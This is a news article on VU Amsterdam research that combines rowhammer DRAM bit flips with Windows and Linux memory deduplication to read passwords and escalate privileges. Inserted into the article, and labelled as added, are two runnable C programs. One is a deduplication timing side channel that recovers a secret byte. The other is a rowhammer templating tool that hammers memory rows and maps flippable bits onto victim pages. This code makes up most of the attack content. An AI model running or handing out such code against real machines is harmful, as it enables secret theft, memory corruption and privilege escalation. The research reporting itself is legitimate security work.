Researchers present exploit that needs no software vulnerability


Security researcher Herbert Bos of the VU and his research group have developed an attack that does not rely on bugs in software. It exploits, among other things, a physical weakness of DRAM memory and allows, for example, passwords to be retrieved.

The attack also means that many end-user systems are vulnerable. The professor of systems and network security demonstrated the technique on a Windows 10 machine running the latest version of the Edge browser, using a JavaScript program and without exploiting any known software bug. He also carried out the attack on Linux. Bos explained his research on Wednesday in the BNR Digitaal programme and will present it at both the IEEE Symposium on Security and Privacy and the Black Hat conference. The research was conducted in collaboration with Erik Bosman, Kaveh Razavi and Cristiano Giuffrida.

The attack has two components. The first, according to Bos, exploits a weakness of DRAM memory chips. The technique is not new and is known as rowhammer: by activating certain memory rows in rapid succession, an attacker disturbs the charge stored in cells of the adjacent rows, so that their state changes and a bit can flip, for example from 0 to 1. This is possible because the cells on modern memory chips are packed so closely together that they electrically interfere with one another.

The second component is that Windows 8.1 and 10, as well as certain virtualization software, enable a memory optimization known as deduplication (memory combining) by default. When two memory pages hold identical contents, they are merged onto a single physical page that both owners then share. This saves physical memory.

The attack assumes the attacker knows that a secret, for example a password or the address of program code, lies at a certain position in memory, and knows the rest of the contents of that page. Bos explains that the attacker then generates a large number of pages identical to the target page, each differing only in the bytes where the secret is stored, one page per guess.

If one of the generated pages matches the secret page byte for byte, the system deduplicates the two. When the attacker afterwards writes to that shared page, the system first has to undo the merge by copying the page, which takes measurably longer than a write to an unshared page. That time difference can be measured even from JavaScript in a browser. Because the attacker knows which of his candidate pages was the slow one, he knows which guess was correct and can thus recover the secret.
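The guess-merge-time loop just described, as an added example in C (this is not the researchers' code). It uses Linux, where the KSM feature merges pages that a process marks MADV_MERGEABLE; on Windows no such marking is needed because memory combining merges pages on its own, and the JavaScript version measures the same write latency with performance.now() on a large typed array. The "victim" page and its secret byte are constructed inside the same process; the function names, the 4x-median threshold, and the 256 candidate pages (one unknown byte) are this example's own assumptions. It needs KSM running (`echo 1 > /sys/kernel/mm/ksm/run`) and a wait long enough for ksmd to merge the matching page.

```c
/* Added example, not the VU researchers' code: deduplication timing
 * side channel on Linux/KSM. Build: cc -O2 -o dedup_probe dedup_probe.c
 * Run:   ./dedup_probe [wait_seconds]   (KSM must be enabled) */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>

#define PAGE 4096
enum { SECRET_OFF = 100, NCAND = 256 };   /* assumed secret position; one page per byte value */

static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}

/* Time one store to a page. A page KSM has merged is mapped read-only, so
 * the store faults and the kernel copies the page first (copy-on-write);
 * that costs microseconds instead of nanoseconds. */
static uint64_t time_write(volatile uint8_t *page) {
    uint64_t t0 = now_ns();
    page[0] ^= 0x80;
    return now_ns() - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Index of the single candidate whose write was far slower than the rest
 * (threshold: four times the median, an assumption of this example), or
 * -1 if no write stands out. */
int pick_merged(const uint64_t *times, size_t n) {
    if (n < 2) return -1;
    uint64_t *sorted = malloc(n * sizeof *sorted);
    if (!sorted) return -1;
    memcpy(sorted, times, n * sizeof *sorted);
    qsort(sorted, n, sizeof *sorted, cmp_u64);
    uint64_t median = sorted[n / 2];
    free(sorted);
    int best = -1;
    uint64_t best_t = 0;
    for (size_t i = 0; i < n; i++)
        if (times[i] > 4 * median && times[i] > best_t) { best = (int)i; best_t = times[i]; }
    return best;
}

int main(int argc, char **argv) {
    int wait_s = argc > 1 ? atoi(argv[1]) : 60;
    uint8_t secret = 0x42;               /* constructed stand-in for the victim's secret byte */
    int flags = MAP_PRIVATE | MAP_ANONYMOUS;
    uint8_t *victim = mmap(NULL, PAGE, PROT_READ | PROT_WRITE, flags, -1, 0);
    uint8_t *cands  = mmap(NULL, NCAND * PAGE, PROT_READ | PROT_WRITE, flags, -1, 0);
    if (victim == MAP_FAILED || cands == MAP_FAILED) { perror("mmap"); return 1; }

    /* Victim page: contents the attacker knows, plus one byte he does not. */
    for (int i = 0; i < PAGE; i++) victim[i] = (uint8_t)(i * 7 + 1);
    victim[SECRET_OFF] = secret;
    /* Candidate pages: identical to the victim page except for the guessed byte. */
    for (int v = 0; v < NCAND; v++) {
        memcpy(cands + v * PAGE, victim, PAGE);
        cands[v * PAGE + SECRET_OFF] = (uint8_t)v;
    }
    /* Keep the pages 4 KiB (KSM does not merge huge pages) and offer them to ksmd. */
    madvise(cands, NCAND * PAGE, MADV_NOHUGEPAGE);
    if (madvise(victim, PAGE, MADV_MERGEABLE) || madvise(cands, NCAND * PAGE, MADV_MERGEABLE)) {
        perror("madvise(MADV_MERGEABLE)");
        return 1;
    }
    printf("waiting %d s for ksmd to merge the matching page...\n", wait_s);
    sleep(wait_s);

    /* First write to every candidate: only the merged one pays the copy-on-write cost. */
    uint64_t times[NCAND];
    for (int v = 0; v < NCAND; v++) times[v] = time_write(cands + v * PAGE);
    int hit = pick_merged(times, NCAND);
    if (hit < 0) { puts("no candidate stood out (is KSM running, was the wait long enough?)"); return 2; }
    printf("slowest write: candidate 0x%02x (%llu ns); actual secret byte 0x%02x\n",
           hit, (unsigned long long)times[hit], secret);
    return hit == secret ? 0 : 3;
}
```

In a real attack the victim page belongs to another process or to the kernel, so the attacker only controls the candidate pages; the measurement step is the same. One pass recovers one byte, so a longer secret is read out a few bytes at a time, with the already recovered bytes fixed in every new batch of candidates.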

In addition, Bos says, the technique can be used to write data to specific places in memory. For this he uses the DRAM weakness described above: he first searches for memory locations where he can reliably flip bits. He then places at such a location a page whose contents match the page holding the sensitive data. The match causes the system to deduplicate the two, which lets the attacker ensure that the victim's data ends up on exactly the physical page where the bit flip is possible.

By then triggering the bit flip, the attacker modifies the sensitive information itself, which can lead, for example, to privilege escalation: the attacker grants himself higher rights and can then perform all kinds of actions on the system.
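The first two steps of that procedure, hammering to find locations where bits flip and checking whether a found flip can actually change a given victim page, as an added example in C (not the researchers' code). It covers the rowhammer component described earlier as well as the placement check here. The buffer size, the assumed row stride, the aggressor placement heuristic, and the names hammer, find_flips and template_usable are this example's own assumptions; whether any flips appear at all depends on the DRAM module, and modules with ECC or target-row refresh may show none. The deduplication step that maps the victim's page onto the flippable location is the same merge mechanism as in the timing attack and is not repeated here.

```c
/* Added example, not the VU researchers' code: rowhammer templating on
 * Linux. Fill a buffer with a known pattern, hammer two aggressor rows
 * around a candidate victim page, then record every bit that changed as
 * a template (offset, bit, direction). Build: cc -O2 -o template template.c */
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static inline void flush(volatile uint8_t *p) { _mm_clflush((const void *)p); }
#else
/* Other architectures need their own cache-maintenance instruction (DC CIVAC
 * on AArch64, for instance); without it accesses stay in the cache, never
 * reach DRAM and nothing is hammered. */
static inline void flush(volatile uint8_t *p) { (void)p; }
#endif

#define PAGE 4096UL
#define BUF_SIZE (64UL << 20)   /* 64 MiB buffer: spans many DRAM rows */
#define ROW_STRIDE (8UL << 10)  /* assumed distance between adjacent rows; varies per memory controller */
#define PATTERN 0xFF            /* all ones, so 1->0 flips are visible */

struct flip {
    size_t offset;   /* byte offset inside the page */
    uint8_t mask;    /* the single bit that flipped */
    int to_one;      /* 1 if the bit went 0->1, 0 if it went 1->0 */
};

/* Read two aggressor addresses alternately, flushing them from the cache
 * each time so that every read opens the DRAM row again. */
void hammer(volatile uint8_t *a, volatile uint8_t *b, unsigned long rounds) {
    for (unsigned long i = 0; i < rounds; i++) {
        (void)*a;
        (void)*b;
        flush(a);
        flush(b);
    }
}

/* Compare a hammered page with the pattern it held before and record every
 * bit that differs. Returns the total number of flips even when only the
 * first max fit in out[]. */
size_t find_flips(const uint8_t *expected, const uint8_t *observed, size_t len,
                  struct flip *out, size_t max) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = expected[i] ^ observed[i];
        while (diff) {
            uint8_t bit = diff & (uint8_t)-diff;   /* lowest set bit */
            if (n < max) out[n] = (struct flip){ i, bit, (observed[i] & bit) != 0 };
            n++;
            diff &= (uint8_t)~bit;
        }
    }
    return n;
}

/* Placement check: a template is useful against a victim page only if the
 * victim's bit at that position holds the value the flip moves away from
 * (a 1->0 template needs a 1 there, a 0->1 template needs a 0). */
int template_usable(const struct flip *f, const uint8_t *victim_page) {
    int bit_is_one = (victim_page[f->offset] & f->mask) != 0;
    return f->to_one ? !bit_is_one : bit_is_one;
}

int main(int argc, char **argv) {
    size_t pages = argc > 1 ? strtoul(argv[1], NULL, 10) : 256;   /* victim pages to scan */
    uint8_t *buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
#ifdef MADV_HUGEPAGE
    madvise(buf, BUF_SIZE, MADV_HUGEPAGE);   /* contiguous physical backing keeps rows adjacent */
#endif
    memset(buf, PATTERN, BUF_SIZE);
    uint8_t expected[PAGE];
    memset(expected, PATTERN, PAGE);

    struct flip found[64];
    size_t total = 0;
    /* Aggressors sit one assumed row above and below each candidate victim page. */
    for (size_t p = 0; p < pages; p++) {
        size_t off = ROW_STRIDE + p * PAGE;
        if (off + ROW_STRIDE + PAGE > BUF_SIZE) break;
        hammer(buf + off - ROW_STRIDE, buf + off + ROW_STRIDE, 1000000UL);
        size_t n = find_flips(expected, buf + off, PAGE, found, 64);
        for (size_t i = 0; i < n && i < 64; i++)
            printf("template: page %zu offset %zu bit 0x%02x %s\n", p, found[i].offset,
                   found[i].mask, found[i].to_one ? "0->1" : "1->0");
        total += n;
        memset(buf + off, PATTERN, PAGE);   /* restore so the next round starts clean */
    }
    printf("%zu flips in %zu pages\n", total, pages);
    return 0;
}
```

A full templating run also hammers with the inverse pattern (all zeros) to catch 0->1 flips, and keeps only templates that reproduce across several runs; a flip that appears once is useless for a targeted write.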

The severity of this attack lies in the fact that little can be done about it and that it requires no existing software bug such as a zero-day. According to Bos, Microsoft has been working on a fix for several months, but none is available yet. Disabling deduplication is an option, but it has major consequences for memory consumption, especially on devices with only a small amount of memory. Bos decided to go public with his findings to make clear that the trust placed in many memory chips is misplaced.
